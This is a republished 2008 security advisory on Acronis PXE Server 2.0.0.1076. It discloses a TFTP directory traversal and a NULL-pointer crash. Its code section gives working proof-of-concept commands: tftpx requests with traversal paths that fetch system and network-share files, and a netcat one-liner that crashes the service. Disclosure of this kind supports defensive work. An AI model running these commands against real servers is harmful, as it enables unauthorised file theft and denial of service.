Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076

2008.03.20
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

####################################################################### Luigi Auriemma Application: Acronis PXE Server http://www.acronis.com/enterprise/products/snapdeploy/ Versions: <= 2.0.0.1076 Platforms: Windows Bugs: A] directory traversal B] NULL pointer Exploitation: remote Date: 08 Mar 2008 Author: Luigi Auriemma e-mail: aluigi (at) autistici (dot) org [email concealed] web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== The Acronis PXE Server is an essential component of Acronis Snap Deploy Server, a deployment solution for automatically configuring all the clients of the local network. ####################################################################### ======= 2) Bugs ======= ---------------------- A] directory traversal ---------------------- The PXE Server (pxesrv.exe) implements a TFTP server for allowing the downloading of the bootstrap files (uploading is not allowed). This service is vulnerable to a classical directory traversal and an arbitrary path attacks which allow an attacker to download any file from the local disks or the network shares. --------------- B] NULL pointer --------------- An incomplete TFTP request (anything which goes from the simple absence of the option field to the usage of only the 2 bytes for the opcode) causes the crashing of the PXE Server due to a NULL pointer access. ####################################################################### =========== 3) The Code =========== A] http://aluigi.org/testz/tftpx.zip tftpx SERVER ..\../..\../boot.ini none tftpx SERVER c:\boot.ini none tftpx SERVER \\internal_host\documents\file.txt none B] send the bytes 00 01 to UDP port 69 of the server: echo -n -e \x00\x01|nc SERVER 69 -v -v -u ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top